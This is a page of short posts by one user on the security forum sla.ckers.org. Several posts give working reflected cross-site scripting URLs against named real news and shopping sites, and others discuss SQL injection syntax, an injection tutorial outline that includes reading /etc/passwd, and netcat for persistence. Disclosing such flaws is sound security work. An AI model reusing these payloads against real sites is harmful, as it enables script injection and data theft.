Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Pages: 1234Next
Current Page: 1 of 4
Results 1 - 30 of 112
2 years ago
wireghoul
Hello, This year there is an advent calendar aimed at security - http://secadvent.com Every day for the period Dec 1 -25 a security related article will be published on the website. Today's article is a crypto type puzzle. Best of luck from the Security Advent Calendar
Forum: News and Links
5 years ago
wireghoul
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
http://www.carsguide.com.au/search/?type=all&Ntt=%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed
Forum: Full Disclosure
5 years ago
wireghoul
Did you try reading the rfc, it might help
Forum: XSS Info
5 years ago
wireghoul
Oh lol.. I borked the forum... let me urlencode that for you http://shop.three.com.au/search/searchResult.jsp?query=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert('ZOMBIES+AHEAD!')%3B%3C%2Fscript%3E%3C%26_requestid%3D542403
Forum: Full Disclosure
5 years ago
wireghoul
http://shop.three.com.au/search/searchResult.jsp?query=";</script><script>alert('ZOMBIES AHEAD!');</script><&_requestid=542403
Forum: Full Disclosure
5 years ago
wireghoul
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C
Forum: Full Disclosure
5 years ago
wireghoul
@rvdh, Thanks Ronald, I'll make sure I grab it and look over it. There probably won't be any significant signature updates until version 1.6 or so as I want to extend my test suite to be able to do signature coverage first. That way I wont break anything too severely when I overhaul the signatures :)
Forum: Projects
5 years ago
wireghoul
Someone really should call rule #34 on this...
Forum: OMG Ponies
5 years ago
wireghoul
11. Graudit
Hi guys, Looking for some feedback, good or bad for graudit. You can grab the latest version from http://www.justanotherhacker.com/projects/graudit.html Cheers
Forum: Projects
5 years ago
wireghoul
Looks like he lost some files; Warning: require_once(/home/content/l/o/k/lokoutshop1/html/includes/defines.php) : failed to open stream: No such file or directory in /home/content/l/o/k/lokoutshop1/html/index.php on line 21 Fatal error: require_once() : Failed opening required '/home/content/l/o/k/lokoutshop1/html/includes/defines.php' (include_path='.:/usr/local/php5/lib/php') in /home/conten
Forum: News and Links
5 years ago
wireghoul
Good stuff! Your comments suffer from a bit of copy/paste with the goal statement, but otherwise far better than the usual run of the mill. I'd like to see some more red herrings in them, but I'm probably in the minority in that regard.
Forum: SQL and Code Injection
5 years ago
wireghoul
Netcat should do, or were you looking for a rootkit approach?
Forum: OMG Ponies
5 years ago
wireghoul
@id, that wasn't a roast, he said he likes jokes.... @marshmellowguy; welcome! grab a beer and pull up a chair, but not too close to the fire :)
Forum: Intro
5 years ago
wireghoul
You should try 4chan, they like jokes...and mudkips. Especially the mudkips!
Forum: Intro
5 years ago
wireghoul
@rvdh And so if he's injecting into a non-mysql database system....syntax'd! Granted there isn't enough evidence to assume one way or another, but I prefer to inject using SQL that isn't vendor specific whenever I can.
Forum: SQL and Code Injection
5 years ago
wireghoul
@rvdh Ok, so it might work in some version of mysql, I'm too lazy to validate that. I know postgresql chokes on it and I'd be willing to put money on oracle, sql server, access, sqlite and others will as well. The safe insert syntax is "insert into <table> column1,column2 VALUES('value1','value2');"
Forum: SQL and Code Injection
5 years ago
wireghoul
INSERT INTO email_pref SET weekly=1, email='mciske@earthlink.net' Are we mixing UPDATE SET and INSERT INTO VALUES are we?
Forum: SQL and Code Injection
5 years ago
wireghoul
So is this touring test 2.0 ? I'm not that interested in AI so I'll probably just smash Eliza and www::mechanize together.
Forum: News and Links
5 years ago
wireghoul
It was test, and www.thedailywtf.com has the screenshot
Forum: News and Links
5 years ago
wireghoul
I was expecting 0x01 - Disclaimer 0x02 - Introduction 0x03 - Fuzzing 0x04 - "Order by" or "Union all select" 0x05 - Database Version & Schema_Name's 0x06 - Viewing Tables & Columns 0x07 - Pulling The Sensitive Information 0x08 - Load_File('etc/passwd') 0x09 - Into Outfile & Into DumpFile 0x0A - Bypassing IDS & IPS's 0x0B - Conclusion And your nu
Forum: SQL and Code Injection
5 years ago
wireghoul
I believe they are being painted...
Forum: OMG Ponies
5 years ago
wireghoul
24. Re: CSP
It's fail in shrinkwrap, the web is so badly written that browsers pack quirk modes, and auto correct your html causing a large number of issues, etc. IMHO we need to take a step back, label mashups as bad practice so people think twice about developing/using them (duh that will happen). Enforce compliance, if your site uses bad html then it will render unreadable and it sucks to be you. Eve
Forum: News and Links
5 years ago
wireghoul
The margin on a $8k refund for a $8k (10% of $80k) return doesn't sufficiently outweigh the cost of 3 years worth of mail forwarding in the scenario you outlined. There is also the problem of finding someone who is willing for sign their house over to you for free for 3 years so you can scam a few bucks, and each participant can only buy one house. Even as a pyramid scheme that is a far cry from r
Forum: OMG Ponies
5 years ago
wireghoul
/Slack/chan needs moar bait!
Forum: News and Links
5 years ago
wireghoul
I'm getting sick of telling you guys... You need to use HTTPS for the "secure" wiki!!!!
Forum: News and Links
5 years ago
wireghoul
You can't append a union after where in jet? (Yes, I'm too lazy to check)
Forum: SQL and Code Injection
5 years ago
wireghoul
Absinthe for the poor souls
Forum: SQL and Code Injection
5 years ago
wireghoul
What, egress filtering? You lie!
Forum: SQL and Code Injection
Pages: 1234Next
Current Page: 1 of 4